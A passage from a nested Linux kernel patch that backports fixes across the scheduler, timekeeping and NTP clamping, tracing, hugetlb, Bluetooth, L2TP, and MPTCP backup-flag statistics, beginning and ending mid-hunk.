+ 	 * When going up, increment the number of cores with SMT present.
+ 	 */
+-	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
+-		static_branch_inc_cpuslocked(&sched_smt_present);
+-#endif
++	sched_smt_present_inc(cpu);
+ 	set_cpu_active(cpu, true);
+ 
+ 	if (sched_smp_initialized) {
+@@ -9485,13 +9498,12 @@ int sched_cpu_deactivate(unsigned int cpu)
+ 	}
+ 	rq_unlock_irqrestore(rq, &rf);
+ 
+-#ifdef CONFIG_SCHED_SMT
+ 	/*
+ 	 * When going down, decrement the number of cores with SMT present.
+ 	 */
+-	if (cpumask_weight(cpu_smt_mask(cpu)) == 2)
+-		static_branch_dec_cpuslocked(&sched_smt_present);
++	sched_smt_present_dec(cpu);
+ 
++#ifdef CONFIG_SCHED_SMT
+ 	sched_core_cpu_deactivate(cpu);
+ #endif
+ 
+@@ -9501,6 +9513,7 @@ int sched_cpu_deactivate(unsigned int cpu)
+ 	sched_update_numa(cpu, false);
+ 	ret = cpuset_cpu_inactive(cpu);
+ 	if (ret) {
++		sched_smt_present_inc(cpu);
+ 		balance_push_set(cpu, false);
+ 		set_cpu_active(cpu, true);
+ 		sched_update_numa(cpu, true);
+diff --git a/kernel/sched/cputime.c b/kernel/sched/cputime.c
+index 95fc778537434..b55b84f3dd542 100644
+--- a/kernel/sched/cputime.c
++++ b/kernel/sched/cputime.c
+@@ -591,6 +591,12 @@ void cputime_adjust(struct task_cputime *curr, struct prev_cputime *prev,
+ 	}
+ 
+ 	stime = mul_u64_u64_div_u64(stime, rtime, stime + utime);
++	/*
++	 * Because mul_u64_u64_div_u64() can approximate on some
++	 * achitectures; enforce the constraint that: a*b/(b+c) <= a.
++	 */
++	if (unlikely(stime > rtime))
++		stime = rtime;
+ 
+ update:
+ 	/*
+diff --git a/kernel/sched/stats.c b/kernel/sched/stats.c
+index 857f837f52cbe..966f4eacfe51d 100644
+--- a/kernel/sched/stats.c
++++ b/kernel/sched/stats.c
+@@ -92,16 +92,6 @@ void __update_stats_enqueue_sleeper(struct rq *rq, struct task_struct *p,
+ 
+ 			trace_sched_stat_blocked(p, delta);
+ 
+-			/*
+-			 * Blocking time is in units of nanosecs, so shift by
+-			 * 20 to get a milliseconds-range estimation of the
+-			 * amount of time that the task spent sleeping:
+-			 */
+-			if (unlikely(prof_on == SLEEP_PROFILING)) {
+-				profile_hits(SLEEP_PROFILING,
+-					     (void *)get_wchan(p),
+-					     delta >> 20);
+-			}
+ 			account_scheduler_latency(p, delta >> 10, 0);
+ 		}
+ 	}
+diff --git a/kernel/time/clocksource-wdtest.c b/kernel/time/clocksource-wdtest.c
+index df922f49d171b..d06185e054ea2 100644
+--- a/kernel/time/clocksource-wdtest.c
++++ b/kernel/time/clocksource-wdtest.c
+@@ -104,8 +104,8 @@ static void wdtest_ktime_clocksource_reset(void)
+ static int wdtest_func(void *arg)
+ {
+ 	unsigned long j1, j2;
++	int i, max_retries;
+ 	char *s;
+-	int i;
+ 
+ 	schedule_timeout_uninterruptible(holdoff * HZ);
+ 
+@@ -139,18 +139,19 @@ static int wdtest_func(void *arg)
+ 	WARN_ON_ONCE(time_before(j2, j1 + NSEC_PER_USEC));
+ 
+ 	/* Verify tsc-like stability with various numbers of errors injected. */
+-	for (i = 0; i <= max_cswd_read_retries + 1; i++) {
+-		if (i <= 1 && i < max_cswd_read_retries)
++	max_retries = clocksource_get_max_watchdog_retry();
++	for (i = 0; i <= max_retries + 1; i++) {
++		if (i <= 1 && i < max_retries)
+ 			s = "";
+-		else if (i <= max_cswd_read_retries)
++		else if (i <= max_retries)
+ 			s = ", expect message";
+ 		else
+ 			s = ", expect clock skew";
+-		pr_info("--- Watchdog with %dx error injection, %lu retries%s.\n", i, max_cswd_read_retries, s);
++		pr_info("--- Watchdog with %dx error injection, %d retries%s.\n", i, max_retries, s);
+ 		WRITE_ONCE(wdtest_ktime_read_ndelays, i);
+ 		schedule_timeout_uninterruptible(2 * HZ);
+ 		WARN_ON_ONCE(READ_ONCE(wdtest_ktime_read_ndelays));
+-		WARN_ON_ONCE((i <= max_cswd_read_retries) !=
++		WARN_ON_ONCE((i <= max_retries) !=
+ 			     !(clocksource_wdtest_ktime.flags & CLOCK_SOURCE_UNSTABLE));
+ 		wdtest_ktime_clocksource_reset();
+ 	}
+diff --git a/kernel/time/clocksource.c b/kernel/time/clocksource.c
+index cc6db3bce1b2f..cd9a59011dee9 100644
+--- a/kernel/time/clocksource.c
++++ b/kernel/time/clocksource.c
+@@ -207,9 +207,6 @@ void clocksource_mark_unstable(struct clocksource *cs)
+ 	spin_unlock_irqrestore(&watchdog_lock, flags);
+ }
+ 
+-ulong max_cswd_read_retries = 2;
+-module_param(max_cswd_read_retries, ulong, 0644);
+-EXPORT_SYMBOL_GPL(max_cswd_read_retries);
+ static int verify_n_cpus = 8;
+ module_param(verify_n_cpus, int, 0644);
+ 
+@@ -221,11 +218,12 @@ enum wd_read_status {
+ 
+ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow, u64 *wdnow)
+ {
+-	unsigned int nretries;
++	unsigned int nretries, max_retries;
+ 	u64 wd_end, wd_end2, wd_delta;
+ 	int64_t wd_delay, wd_seq_delay;
+ 
+-	for (nretries = 0; nretries <= max_cswd_read_retries; nretries++) {
++	max_retries = clocksource_get_max_watchdog_retry();
++	for (nretries = 0; nretries <= max_retries; nretries++) {
+ 		local_irq_disable();
+ 		*wdnow = watchdog->read(watchdog);
+ 		*csnow = cs->read(cs);
+@@ -237,7 +235,7 @@ static enum wd_read_status cs_watchdog_read(struct clocksource *cs, u64 *csnow,
+ 		wd_delay = clocksource_cyc2ns(wd_delta, watchdog->mult,
+ 					      watchdog->shift);
+ 		if (wd_delay <= WATCHDOG_MAX_SKEW) {
+-			if (nretries > 1 || nretries >= max_cswd_read_retries) {
++			if (nretries > 1 && nretries >= max_retries) {
+ 				pr_warn("timekeeping watchdog on CPU%d: %s retried %d times before success\n",
+ 					smp_processor_id(), watchdog->name, nretries);
+ 			}
+diff --git a/kernel/time/ntp.c b/kernel/time/ntp.c
+index 406dccb79c2b6..8d2dd214ec682 100644
+--- a/kernel/time/ntp.c
++++ b/kernel/time/ntp.c
+@@ -727,17 +727,16 @@ static inline void process_adjtimex_modes(const struct __kernel_timex *txc,
+ 	}
+ 
+ 	if (txc->modes & ADJ_MAXERROR)
+-		time_maxerror = txc->maxerror;
++		time_maxerror = clamp(txc->maxerror, 0, NTP_PHASE_LIMIT);
+ 
+ 	if (txc->modes & ADJ_ESTERROR)
+-		time_esterror = txc->esterror;
++		time_esterror = clamp(txc->esterror, 0, NTP_PHASE_LIMIT);
+ 
+ 	if (txc->modes & ADJ_TIMECONST) {
+-		time_constant = txc->constant;
++		time_constant = clamp(txc->constant, 0, MAXTC);
+ 		if (!(time_status & STA_NANO))
+ 			time_constant += 4;
+-		time_constant = min(time_constant, (long)MAXTC);
+-		time_constant = max(time_constant, 0l);
++		time_constant = clamp(time_constant, 0, MAXTC);
+ 	}
+ 
+ 	if (txc->modes & ADJ_TAI &&
+diff --git a/kernel/time/tick-broadcast.c b/kernel/time/tick-broadcast.c
+index ba551ec546f52..13a71a894cc16 100644
+--- a/kernel/time/tick-broadcast.c
++++ b/kernel/time/tick-broadcast.c
+@@ -1137,7 +1137,6 @@ void tick_broadcast_switch_to_oneshot(void)
+ #ifdef CONFIG_HOTPLUG_CPU
+ void hotplug_cpu__broadcast_tick_pull(int deadcpu)
+ {
+-	struct tick_device *td = this_cpu_ptr(&tick_cpu_device);
+ 	struct clock_event_device *bc;
+ 	unsigned long flags;
+ 
+@@ -1163,6 +1162,8 @@ void hotplug_cpu__broadcast_tick_pull(int deadcpu)
+ 		 * device to avoid the starvation.
+ 		 */
+ 		if (tick_check_broadcast_expired()) {
++			struct tick_device *td = this_cpu_ptr(&tick_cpu_device);
++
+ 			cpumask_clear_cpu(smp_processor_id(), tick_broadcast_force_mask);
+ 			tick_program_event(td->evtdev->next_event, 1);
+ 		}
+diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
+index b158cbef4d8dc..8ac43afc11f96 100644
+--- a/kernel/time/timekeeping.c
++++ b/kernel/time/timekeeping.c
+@@ -2476,7 +2476,7 @@ int do_adjtimex(struct __kernel_timex *txc)
+ 		clock_set |= timekeeping_advance(TK_ADV_FREQ);
+ 
+ 	if (clock_set)
+-		clock_was_set(CLOCK_REALTIME);
++		clock_was_set(CLOCK_SET_WALL);
+ 
+ 	ntp_notify_cmos_timer();
+ 
+diff --git a/kernel/trace/tracing_map.c b/kernel/trace/tracing_map.c
+index a4dcf0f243521..3a56e7c8aa4f6 100644
+--- a/kernel/trace/tracing_map.c
++++ b/kernel/trace/tracing_map.c
+@@ -454,7 +454,7 @@ static struct tracing_map_elt *get_free_elt(struct tracing_map *map)
+ 	struct tracing_map_elt *elt = NULL;
+ 	int idx;
+ 
+-	idx = atomic_inc_return(&map->next_elt);
++	idx = atomic_fetch_add_unless(&map->next_elt, 1, map->max_elts);
+ 	if (idx < map->max_elts) {
+ 		elt = *(TRACING_MAP_ELT(map->elts, idx));
+ 		if (map->ops && map->ops->elt_init)
+@@ -699,7 +699,7 @@ void tracing_map_clear(struct tracing_map *map)
+ {
+ 	unsigned int i;
+ 
+-	atomic_set(&map->next_elt, -1);
++	atomic_set(&map->next_elt, 0);
+ 	atomic64_set(&map->hits, 0);
+ 	atomic64_set(&map->drops, 0);
+ 
+@@ -783,7 +783,7 @@ struct tracing_map *tracing_map_create(unsigned int map_bits,
+ 
+ 	map->map_bits = map_bits;
+ 	map->max_elts = (1 << map_bits);
+-	atomic_set(&map->next_elt, -1);
++	atomic_set(&map->next_elt, 0);
+ 
+ 	map->map_size = (1 << (map_bits + 1));
+ 	map->ops = ops;
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 1b7f5950d6037..f97b221fb6567 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -608,7 +608,7 @@ static unsigned long __thp_get_unmapped_area(struct file *filp,
+ 	loff_t off_align = round_up(off, size);
+ 	unsigned long len_pad, ret;
+ 
+-	if (IS_ENABLED(CONFIG_32BIT) || in_compat_syscall())
++	if (!IS_ENABLED(CONFIG_64BIT) || in_compat_syscall())
+ 		return 0;
+ 
+ 	if (off_end <= off_align || (off_end - off_align) < size)
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 05b8797163b2b..14b9494c58ede 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -1785,13 +1785,6 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ 		return;
+ 	}
+ 
+-	/*
+-	 * Move PageHWPoison flag from head page to the raw error pages,
+-	 * which makes any healthy subpages reusable.
+-	 */
+-	if (unlikely(PageHWPoison(page)))
+-		hugetlb_clear_page_hwpoison(page);
+-
+ 	/*
+ 	 * If vmemmap pages were allocated above, then we need to clear the
+ 	 * hugetlb destructor under the hugetlb lock.
+@@ -1802,6 +1795,13 @@ static void __update_and_free_page(struct hstate *h, struct page *page)
+ 		spin_unlock_irq(&hugetlb_lock);
+ 	}
+ 
++	/*
++	 * Move PageHWPoison flag from head page to the raw error pages,
++	 * which makes any healthy subpages reusable.
++	 */
++	if (unlikely(PageHWPoison(page)))
++		hugetlb_clear_page_hwpoison(page);
++
+ 	for (i = 0; i < pages_per_huge_page(h); i++) {
+ 		subpage = nth_page(page, i);
+ 		subpage->flags &= ~(1 << PG_locked | 1 << PG_error |
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 320fc1e6dff2a..3d6a22812b498 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -2880,6 +2880,20 @@ static int hci_passive_scan_sync(struct hci_dev *hdev)
+ 	} else if (hci_is_adv_monitoring(hdev)) {
+ 		window = hdev->le_scan_window_adv_monitor;
+ 		interval = hdev->le_scan_int_adv_monitor;
++
++		/* Disable duplicates filter when scanning for advertisement
++		 * monitor for the following reasons.
++		 *
++		 * For HW pattern filtering (ex. MSFT), Realtek and Qualcomm
++		 * controllers ignore RSSI_Sampling_Period when the duplicates
++		 * filter is enabled.
++		 *
++		 * For SW pattern filtering, when we're not doing interleaved
++		 * scanning, it is necessary to disable duplicates filter,
++		 * otherwise hosts can only receive one advertisement and it's
++		 * impossible to know if a peer is still in range.
++		 */
++		filter_dups = LE_SCAN_FILTER_DUP_DISABLE;
+ 	} else {
+ 		window = hdev->le_scan_window;
+ 		interval = hdev->le_scan_interval;
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 98dabbbe42938..209c6d458d336 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -7811,6 +7811,7 @@ static void l2cap_conless_channel(struct l2cap_conn *conn, __le16 psm,
+ 	bt_cb(skb)->l2cap.psm = psm;
+ 
+ 	if (!chan->ops->recv(chan, skb)) {
++		l2cap_chan_unlock(chan);
+ 		l2cap_chan_put(chan);
+ 		return;
+ 	}
+diff --git a/net/bridge/br_multicast.c b/net/bridge/br_multicast.c
+index 9765f9f9bf7ff..3cd2b648408d6 100644
+--- a/net/bridge/br_multicast.c
++++ b/net/bridge/br_multicast.c
+@@ -1890,16 +1890,14 @@ void br_multicast_del_port(struct net_bridge_port *port)
+ {
+ 	struct net_bridge *br = port->br;
+ 	struct net_bridge_port_group *pg;
+-	HLIST_HEAD(deleted_head);
+ 	struct hlist_node *n;
+ 
+ 	/* Take care of the remaining groups, only perm ones should be left */
+ 	spin_lock_bh(&br->multicast_lock);
+ 	hlist_for_each_entry_safe(pg, n, &port->mglist, mglist)
+ 		br_multicast_find_del_pg(br, pg);
+-	hlist_move_list(&br->mcast_gc_list, &deleted_head);
+ 	spin_unlock_bh(&br->multicast_lock);
+-	br_multicast_gc(&deleted_head);
++	flush_work(&br->mcast_gc_work);
+ 	br_multicast_port_ctx_deinit(&port->multicast_ctx);
+ 	free_percpu(port->mcast_stats);
+ }
+diff --git a/net/core/link_watch.c b/net/core/link_watch.c
+index 13513efcfbfe8..cdabced98b116 100644
+--- a/net/core/link_watch.c
++++ b/net/core/link_watch.c
+@@ -139,9 +139,9 @@ static void linkwatch_schedule_work(int urgent)
+ 	 * override the existing timer.
+ 	 */
+ 	if (test_bit(LW_URGENT, &linkwatch_flags))
+-		mod_delayed_work(system_wq, &linkwatch_work, 0);
++		mod_delayed_work(system_unbound_wq, &linkwatch_work, 0);
+ 	else
+-		schedule_delayed_work(&linkwatch_work, delay);
++		queue_delayed_work(system_unbound_wq, &linkwatch_work, delay);
+ }
+ 
+ 
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index fb26401950e7e..df79044fbf3c4 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -1120,6 +1120,7 @@ static int ip6_dst_lookup_tail(struct net *net, const struct sock *sk,
+ 		from = rt ? rcu_dereference(rt->from) : NULL;
+ 		err = ip6_route_get_saddr(net, from, &fl6->daddr,
+ 					  sk ? inet6_sk(sk)->srcprefs : 0,
++					  fl6->flowi6_l3mdev,
+ 					  &fl6->saddr);
+ 		rcu_read_unlock();
+ 
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index 151414e9f7fe4..8c1d9e6124363 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -5681,7 +5681,7 @@ static int rt6_fill_node(struct net *net, struct sk_buff *skb,
+ 				goto nla_put_failure;
+ 	} else if (dest) {
+ 		struct in6_addr saddr_buf;
+-		if (ip6_route_get_saddr(net, rt, dest, 0, &saddr_buf) == 0 &&
++		if (ip6_route_get_saddr(net, rt, dest, 0, 0, &saddr_buf) == 0 &&
+ 		    nla_put_in6_addr(skb, RTA_PREFSRC, &saddr_buf))
+ 			goto nla_put_failure;
+ 	}
+diff --git a/net/l2tp/l2tp_core.c b/net/l2tp/l2tp_core.c
+index 8d21ff25f1602..70da78ab95202 100644
+--- a/net/l2tp/l2tp_core.c
++++ b/net/l2tp/l2tp_core.c
+@@ -88,6 +88,11 @@
+ /* Default trace flags */
+ #define L2TP_DEFAULT_DEBUG_FLAGS	0
+ 
++#define L2TP_DEPTH_NESTING		2
++#if L2TP_DEPTH_NESTING == SINGLE_DEPTH_NESTING
++#error "L2TP requires its own lockdep subclass"
++#endif
++
+ /* Private data stored for received packets in the skb.
+  */
+ struct l2tp_skb_cb {
+@@ -1041,7 +1046,13 @@ static int l2tp_xmit_core(struct l2tp_session *session, struct sk_buff *skb, uns
+ 	IPCB(skb)->flags &= ~(IPSKB_XFRM_TUNNEL_SIZE | IPSKB_XFRM_TRANSFORMED | IPSKB_REROUTED);
+ 	nf_reset_ct(skb);
+ 
+-	bh_lock_sock_nested(sk);
++	/* L2TP uses its own lockdep subclass to avoid lockdep splats caused by
++	 * nested socket calls on the same lockdep socket class. This can
++	 * happen when data from a user socket is routed over l2tp, which uses
++	 * another userspace socket.
++	 */
++	spin_lock_nested(&sk->sk_lock.slock, L2TP_DEPTH_NESTING);
++
+ 	if (sock_owned_by_user(sk)) {
+ 		kfree_skb(skb);
+ 		ret = NET_XMIT_DROP;
+@@ -1093,7 +1104,7 @@ static int l2tp_xmit_core(struct l2tp_session *session, struct sk_buff *skb, uns
+ 	ret = l2tp_xmit_queue(tunnel, skb, &inet->cork.fl);
+ 
+ out_unlock:
+-	bh_unlock_sock(sk);
++	spin_unlock(&sk->sk_lock.slock);
+ 
+ 	return ret;
+ }
+diff --git a/net/mptcp/mib.c b/net/mptcp/mib.c
+index 0dac2863c6e1e..1f3161a38b9d2 100644
+--- a/net/mptcp/mib.c
++++ b/net/mptcp/mib.c
+@@ -19,7 +19,9 @@ static const struct snmp_mib mptcp_snmp_list[] = {
+ 	SNMP_MIB_ITEM("MPTCPRetrans", MPTCP_MIB_RETRANSSEGS),
+ 	SNMP_MIB_ITEM("MPJoinNoTokenFound", MPTCP_MIB_JOINNOTOKEN),
+ 	SNMP_MIB_ITEM("MPJoinSynRx", MPTCP_MIB_JOINSYNRX),
++	SNMP_MIB_ITEM("MPJoinSynBackupRx", MPTCP_MIB_JOINSYNBACKUPRX),
+ 	SNMP_MIB_ITEM("MPJoinSynAckRx", MPTCP_MIB_JOINSYNACKRX),
++	SNMP_MIB_ITEM("MPJoinSynAckBackupRx", MPTCP_MIB_JOINSYNACKBACKUPRX),
+ 	SNMP_MIB_ITEM("MPJoinSynAckHMacFailure", MPTCP_MIB_JOINSYNACKMAC),
+ 	SNMP_MIB_ITEM("MPJoinAckRx", MPTCP_MIB_JOINACKRX),
+ 	SNMP_MIB_ITEM("MPJoinAckHMacFailure", MPTCP_MIB_JOINACKMAC),
+diff --git a/net/mptcp/mib.h b/net/mptcp/mib.h
+index 2be3596374f4e..a7b94f5c5d277 100644
+--- a/net/mptcp/mib.h
++++ b/net/mptcp/mib.h
+@@ -12,7 +12,9 @@ enum linux_mptcp_mib_field {
+ 	MPTCP_MIB_RETRANSSEGS,		/* Segments retransmitted at the MPTCP-level */
+ 	MPTCP_MIB_JOINNOTOKEN,		/* Received MP_JOIN but the token was not found */
+ 	MPTCP_MIB_JOINSYNRX,		/* Received a SYN + MP_JOIN */
++	MPTCP_MIB_JOINSYNBACKUPRX,	/* Received a SYN + MP_JOIN + backup flag */
+ 	MPTCP_MIB_JOINSYNACKRX,		/* Received a SYN/ACK + MP_JOIN */
++	MPTCP_MIB_JOINSYNACKBACKUPRX,	/* Received a SYN/ACK + MP_JOIN + backup flag */
+ 	MPTCP_MIB_JOINSYNACKMAC,	/* HMAC was wrong on SYN/ACK + MP_JOIN */
+ 	MPTCP_MIB_JOINACKRX,		/* Received an ACK + MP_JOIN */
+ 	MPTCP_MIB_JOINACKMAC,		/* HMAC was wrong on ACK + MP_JOIN */
+diff --git a/net/mptcp/pm.c b/net/mptcp/pm.c
+index 10c288a0cb0c2..a27ee627addef 100644
+--- a/net/mptcp/pm.c
++++ b/net/mptcp/pm.c
+@@ -416,6 +416,18 @@ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	return mptcp_pm_nl_get_local_id(msk, skc);
+ }
+ 
++bool mptcp_pm_is_backup(struct mptcp_sock *msk, struct sock_common *skc)
++{
++	struct mptcp_addr_info skc_local;
++
++	mptcp_local_address((struct sock_common *)skc, &skc_local);
++
++	if (mptcp_pm_is_userspace(msk))
++		return mptcp_userspace_pm_is_backup(msk, &skc_local);
++
++	return mptcp_pm_nl_is_backup(msk, &skc_local);
++}
++
+ void mptcp_pm_subflow_chk_stale(const struct mptcp_sock *msk, struct sock *ssk)
+ {
+ 	struct mptcp_subflow_context *subflow = mptcp_subflow_ctx(ssk);
+diff --git a/net/mptcp/pm_netlink.c b/net/mptcp/pm_netlink.c
+index e9dff63825817..2b5a5680f09ac 100644
+--- a/net/mptcp/pm_netlink.c
++++ b/net/mptcp/pm_netlink.c
+@@ -86,8 +86,7 @@ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+ 	return a->port == b->port;
+ }
+ 
+-static void local_address(const struct sock_common *skc,
+-			  struct mptcp_addr_info *addr)
++void mptcp_local_address(const struct sock_common *skc, struct mptcp_addr_info *addr)
+ {
+ 	addr->family = skc->skc_family;
+ 	addr->port = htons(skc->skc_num);
+@@ -122,7 +121,7 @@ static bool lookup_subflow_by_saddr(const struct list_head *list,
+ 	list_for_each_entry(subflow, list, node) {
+ 		skc = (struct sock_common *)mptcp_subflow_tcp_sock(subflow);
+ 
+-		local_address(skc, &cur);
++		mptcp_local_address(skc, &cur);
+ 		if (mptcp_addresses_equal(&cur, saddr, saddr->port))
+ 			return true;
+ 	}
+@@ -274,7 +273,7 @@ bool mptcp_pm_sport_in_anno_list(struct mptcp_sock *msk, const struct sock *sk)
+ 	struct mptcp_addr_info saddr;
+ 	bool ret = false;
+ 
+-	local_address((struct sock_common *)sk, &saddr);
++	mptcp_local_address((struct sock_common *)sk, &saddr);
+ 
+ 	spin_lock_bh(&msk->pm.lock);
+ 	list_for_each_entry(entry, &msk->pm.anno_list, list) {
+@@ -545,7 +544,7 @@ static void mptcp_pm_create_subflow_or_signal_addr(struct mptcp_sock *msk)
+ 		struct mptcp_addr_info mpc_addr;
+ 		bool backup = false;
+ 
+-		local_address((struct sock_common *)msk->first, &mpc_addr);
++		mptcp_local_address((struct sock_common *)msk->first, &mpc_addr);
+ 		rcu_read_lock();
+ 		entry = __lookup_addr(pernet, &mpc_addr, false);
+ 		if (entry) {
+@@ -753,7 +752,7 @@ int mptcp_pm_nl_mp_prio_send_ack(struct mptcp_sock *msk,
+ 		struct sock *ssk = mptcp_subflow_tcp_sock(subflow);
+ 		struct mptcp_addr_info local, remote;
+ 
+-		local_address((struct sock_common *)ssk, &local);
++		mptcp_local_address((struct sock_common *)ssk, &local);
+ 		if (!mptcp_addresses_equal(&local, addr, addr->port))
+ 			continue;
+ 
+@@ -1072,8 +1071,8 @@ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	/* The 0 ID mapping is defined by the first subflow, copied into the msk
+ 	 * addr
+ 	 */
+-	local_address((struct sock_common *)msk, &msk_local);
+-	local_address((struct sock_common *)skc, &skc_local);
++	mptcp_local_address((struct sock_common *)msk, &msk_local);
++	mptcp_local_address((struct sock_common *)skc, &skc_local);
+ 	if (mptcp_addresses_equal(&msk_local, &skc_local, false))
+ 		return 0;
+ 
+@@ -1111,6 +1110,24 @@ int mptcp_pm_nl_get_local_id(struct mptcp_sock *msk, struct sock_common *skc)
+ 	return ret;
+ }
+ 
++bool mptcp_pm_nl_is_backup(struct mptcp_sock *msk, struct mptcp_addr_info *skc)
++{
++	struct pm_nl_pernet *pernet = pm_nl_get_pernet_from_msk(msk);
++	struct mptcp_pm_addr_entry *entry;
++	bool backup = false;
++
++	rcu_read_lock();
++	list_for_each_entry_rcu(entry, &pernet->local_addr_list, list) {
++		if (mptcp_addresses_equal(&entry->addr, skc, entry->addr.port)) {
++			backup = !!(entry->flags & MPTCP_PM_ADDR_FLAG_BACKUP);
++			break;
++		}
++	}
++	rcu_read_unlock();
++
++	return backup;
++}
++
+ #define MPTCP_PM_CMD_GRP_OFFSET       0
+ #define MPTCP_PM_EV_GRP_OFFSET        1
+ 
+@@ -1343,8 +1360,8 @@ static int mptcp_nl_cmd_add_addr(struct sk_buff *skb, struct genl_info *info)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	if (addr.addr.port && !(addr.flags & MPTCP_PM_ADDR_FLAG_SIGNAL)) {
+-		GENL_SET_ERR_MSG(info, "flags must have signal when using port");
++	if (addr.addr.port && !address_use_port(&addr)) {
++		GENL_SET_ERR_MSG(info, "flags must have signal and not subflow when using port");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -1507,7 +1524,7 @@ static int mptcp_nl_remove_id_zero_address(struct net *net,
+ 		if (list_empty(&msk->conn_list) || mptcp_pm_is_userspace(msk))
+ 			goto next;
+ 
+-		local_address((struct sock_common *)msk, &msk_local);
++		mptcp_local_address((struct sock_common *)msk, &msk_local);
+ 		if (!mptcp_addresses_equal(&msk_local, addr, addr->port))
+ 			goto next;
+ 
+diff --git a/net/mptcp/pm_userspace.c b/net/mptcp/pm_userspace.c
+index 414ed70e7ba2e..278ba5955dfd1 100644
+--- a/net/mptcp/pm_userspace.c
++++ b/net/mptcp/pm_userspace.c
+@@ -159,6 +159,24 @@ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk,
+ 	return mptcp_userspace_pm_append_new_local_addr(msk, &new_entry, true);
+ }
+ 
++bool mptcp_userspace_pm_is_backup(struct mptcp_sock *msk,
++				  struct mptcp_addr_info *skc)
++{
++	struct mptcp_pm_addr_entry *entry;
++	bool backup = false;
++
++	spin_lock_bh(&msk->pm.lock);
++	list_for_each_entry(entry, &msk->pm.userspace_pm_local_addr_list, list) {
++		if (mptcp_addresses_equal(&entry->addr, skc, false)) {
++			backup = !!(entry->flags & MPTCP_PM_ADDR_FLAG_BACKUP);
++			break;
++		}
++	}
++	spin_unlock_bh(&msk->pm.lock);
++
++	return backup;
++}
++
+ int mptcp_nl_cmd_announce(struct sk_buff *skb, struct genl_info *info)
+ {
+ 	struct nlattr *token = info->attrs[MPTCP_PM_ATTR_TOKEN];
+diff --git a/net/mptcp/protocol.h b/net/mptcp/protocol.h
+index a2b85eebb620b..9e582725ccb41 100644
+--- a/net/mptcp/protocol.h
++++ b/net/mptcp/protocol.h
+@@ -618,6 +618,7 @@ void __mptcp_unaccepted_force_close(struct sock *sk);
+ 
+ bool mptcp_addresses_equal(const struct mptcp_addr_info *a,
+ 			   const struct mptcp_addr_info *b, bool use_port);
++void mptcp_local_address(const struct sock_common *skc, struct mptcp_addr_info *addr);
+ 
+ /* called with sk socket lock held */
+ int __mptcp_subflow_connect(struct sock *sk, const struct mptcp_addr_info *loc,
+@@ -912,6 +913,9 @@ bool mptcp_pm_rm_addr_signal(struct mptcp_sock *msk, unsigned int remaining,
+ 			     struct mptcp_rm_list *rm_list);
+ int mptcp_pm_get_local_id(struct mptcp_sock *msk, struct sock_common *skc);
+ int mptcp_userspace_pm_get_local_id(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
++bool mptcp_pm_is_backup(struct mptcp_sock *msk, struct sock_common *skc);
++bool mptcp_pm_nl_is_backup(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
++bool mptcp_userspace_pm_is_backup(struct mptcp_sock *msk, struct mptcp_addr_info *skc);
+ 
+ static inline u8 subflow_get_local_id(const struct mptcp_subflow_context *subflow)
+ {
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 96bdd4119578f..b47673b370279 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -99,6 +99,7 @@ static struct mptcp_sock *subflow_token_join_request(struct request_sock *req)
+ 		return NULL;
+ 	}
+ 	subflow_req->local_id = local_id;
++	subflow_req->request_bkup = mptcp_pm_is_backup(msk, (struct sock_common *)req);
+ 
+ 	return msk;
+ }
+@@ -165,6 +166,9 @@ static int subflow_check_req(struct request_sock *req,
+ 			return 0;
+ 	} else if (opt_mp_join) {
+ 		SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_JOINSYNRX);
++
++		if (mp_opt.backup)
++			SUBFLOW_REQ_INC_STATS(req, MPTCP_MIB_JOINSYNBACKUPRX);
+ 	}
+ 
+ 	if (opt_mp_capable && listener->request_mptcp) {
+@@ -469,6 +473,9 @@ static void subflow_finish_connect(struct sock *sk, const struct sk_buff *skb)
+ 		subflow->mp_join = 1;
+ 		MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_JOINSYNACKRX);
+ 
++		if (subflow->backup)
++			MPTCP_INC_STATS(sock_net(sk), MPTCP_MIB_JOINSYNACKBACKUPRX);
++
+ 		if (subflow_use_different_dport(mptcp_sk(parent), sk)) {
+ 			pr_debug("synack inet_dport=%d %d",
+ 				 ntohs(inet_sk(sk)->inet_dport),
+@@ -507,6 +514,8 @@ static int subflow_chk_local_id(struct sock *sk)
+ 		return err;
+ 
+ 	subflow_set_local_id(subflow, err);
++	subflow->request_bkup = mptcp_pm_is_backup(msk, (struct sock_common *)sk);
++
+ 	return 0;
+ }
+ 
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index d18b698139caf..10180d280e792 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -3119,18 +3119,17 @@ static struct nft_expr *nft_expr_init(const struct nft_ctx *ctx,
+ 	return ERR_PTR(err);
+ }
+ 
+-int nft_expr_clone(struct nft_expr *dst, struct nft_expr *src)
